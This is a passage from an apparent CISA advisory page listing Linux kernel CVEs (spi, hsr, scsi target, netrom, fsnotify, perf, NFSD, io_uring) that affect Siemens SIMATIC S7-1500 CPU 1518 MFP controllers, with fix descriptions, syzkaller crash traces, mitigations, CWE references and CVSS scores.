<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/266.html">CWE-266 Incorrect Privilege Assignment</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.1</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68773</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: spi: fsl-cpm: Check length parity before switching to 16 bit mode Commit fc96ec826bce ("spi: fsl-cpm: Use 16 bit mode for large transfers with even size") failed to make sure that the size is really even before switching to 16 bit mode. Until recently the problem went unnoticed because kernfs uses a pre-allocated bounce buffer of size PAGE_SIZE for reading EEPROM. But commit 8ad6249c51d0 ("eeprom: at25: convert to spi-mem API") introduced an additional dynamically allocated bounce buffer whose size is exactly the size of the transfer, leading to a buffer overrun in the fsl-cpm driver when that size is odd. Add the missing length parity verification and remain in 8 bit mode when the length is not even.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68773">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68776</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() prp_get_untagged_frame() calls __pskb_copy() to create frame-&gt;skb_std but doesn't check if the allocation failed. If __pskb_copy() returns NULL, skb_clone() is called with a NULL pointer, causing a crash: Oops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f] CPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041 Code: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 &lt;43&gt; 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c RSP: 0018:ffffc9000d00f200 EFLAGS: 00010207 RAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480 RDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000 RBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee R10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000 R13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00 FS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0 Call Trace: hsr_forward_do net/hsr/hsr_forward.c:-1 [inline] hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741 hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84 __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966 __netif_receive_skb_one_core net/core/dev.c:6077 [inline] __netif_receive_skb+0x72/0x380 net/core/dev.c:6192 netif_receive_skb_internal net/core/dev.c:6278 [inline] netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337 tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485 tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953 tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x5c9/0xb30 fs/read_write.c:686 ksys_write+0x145/0x250 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f0449f8e1ff Code: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 &lt;48&gt; 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48 RSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff RDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8 RBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000 R10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001 R13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003 Add a NULL check immediately after __pskb_copy() to handle allocation failures gracefully.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68776">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68782</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: scsi: target: Reset t_task_cdb pointer in error case If allocation of cmd-&gt;t_task_cdb fails, it remains NULL but is later dereferenced in the 'err' path. In case of error, reset NULL t_task_cdb value to point at the default fixed-size buffer. Found by Linux Verification Center (linuxtesting.org) with SVACE.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68782">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68787</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netrom: Fix memory leak in nr_sendmsg() syzbot reported a memory leak [1]. When function sock_alloc_send_skb() return NULL in nr_output(), the original skb is not freed, which was allocated in nr_sendmsg(). Fix this by freeing it before return. [1] BUG: memory leak unreferenced object 0xffff888129f35500 (size 240): comm "syz.0.17", pid 6119, jiffies 4294944652 hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 10 52 28 81 88 ff ff ..........R(.... backtrace (crc 1456a3e4): kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline] slab_post_alloc_hook mm/slub.c:4983 [inline] slab_alloc_node mm/slub.c:5288 [inline] kmem_cache_alloc_node_noprof+0x36f/0x5e0 mm/slub.c:5340 __alloc_skb+0x203/0x240 net/core/skbuff.c:660 alloc_skb include/linux/skbuff.h:1383 [inline] alloc_skb_with_frags+0x69/0x3f0 net/core/skbuff.c:6671 sock_alloc_send_pskb+0x379/0x3e0 net/core/sock.c:2965 sock_alloc_send_skb include/net/sock.h:1859 [inline] nr_sendmsg+0x287/0x450 net/netrom/af_netrom.c:1105 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] sock_write_iter+0x293/0x2a0 net/socket.c:1195 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x45d/0x710 fs/read_write.c:686 ksys_write+0x143/0x170 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xa4/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68787">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68788</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fsnotify: do not generate ACCESS/MODIFY events on child for special files inotify/fanotify do not allow users with no read access to a file to subscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the same user to subscribe for watching events on children when the user has access to the parent directory (e.g. /dev). Users with no read access to a file but with read access to its parent directory can still stat the file and see if it was accessed/modified via atime/mtime change. The same is not true for special files (e.g. /dev/null). Users will not generally observe atime/mtime changes when other users read/write to special files, only when someone sets atime/mtime via utimensat(). Align fsnotify events with this stat behavior and do not generate ACCESS/MODIFY events to parent watchers on read/write of special files. The events are still generated to parent watchers on utimensat(). This closes some side-channels that could be possibly used for information exfiltration [1]. [1] https://snee.la/pdf/pubs/file-notification-attacks.pdf</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68788">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/360.html">CWE-360 Trust of System Event Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68798</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: perf/x86/amd: Check event before enable to avoid GPF On AMD machines cpuc-&gt;events[idx] can become NULL in a subtle race condition with NMI-&gt;throttle-&gt;x86_pmu_stop(). Check event for NULL in amd_pmu_enable_all() before enable to avoid a GPF. This appears to be an AMD only issue. Syzkaller reported a GPF in amd_pmu_enable_all. INFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143 msecs Oops: general protection fault, probably for non-canonical address 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7] CPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk RIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195 arch/x86/events/core.c:1430) RSP: 0018:ffff888118009d60 EFLAGS: 00010012 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0 RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002 R13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601 FS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0 Call Trace: amd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2)) x86_pmu_enable (arch/x86/events/core.c:1360) event_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186 kernel/events/core.c:2346) __perf_remove_from_context (kernel/events/core.c:2435) event_function (kernel/events/core.c:259) remote_function (kernel/events/core.c:92 (discriminator 1) kernel/events/core.c:72 (discriminator 1)) __flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64 kernel/smp.c:135 kernel/smp.c:540) __sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272) sysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47) arch/x86/kernel/smp.c:266 (discriminator 47))</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68798">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68803</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: NFSD: NFSv4 file creation neglects setting ACL An NFSv4 client that sets an ACL with a named principal during file creation retrieves the ACL afterwards, and finds that it is only a default ACL (based on the mode bits) and not the ACL that was requested during file creation. This violates RFC 8881 section 6.4.1.3: "the ACL attribute is set as given". The issue occurs in nfsd_create_setattr(), which calls nfsd_attrs_valid() to determine whether to call nfsd_setattr(). However, nfsd_attrs_valid() checks only for iattr changes and security labels, but not POSIX ACLs. When only an ACL is present, the function returns false, nfsd_setattr() is skipped, and the POSIX ACL is never applied to the inode. Subsequently, when the client retrieves the ACL, the server finds no POSIX ACL on the inode and returns one generated from the file's mode bits rather than returning the originally-specified ACL.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68803">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68814</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: io_uring: fix filename leak in __io_openat_prep() __io_openat_prep() allocates a struct filename using getname(). However, for the condition of the file being installed in the fixed file table as well as having O_CLOEXEC flag set, the function returns early. At that point, the request doesn't have REQ_F_NEED_CLEANUP flag set. Due to this, the memory for the newly allocated struct filename is not cleaned up, causing a memory leak. Fix this by setting the REQ_F_NEED_CLEANUP for the request just after the successful getname() call, so that when the request is torn down, the filename will be cleaned up, along with other resources needing cleanup.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68814">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
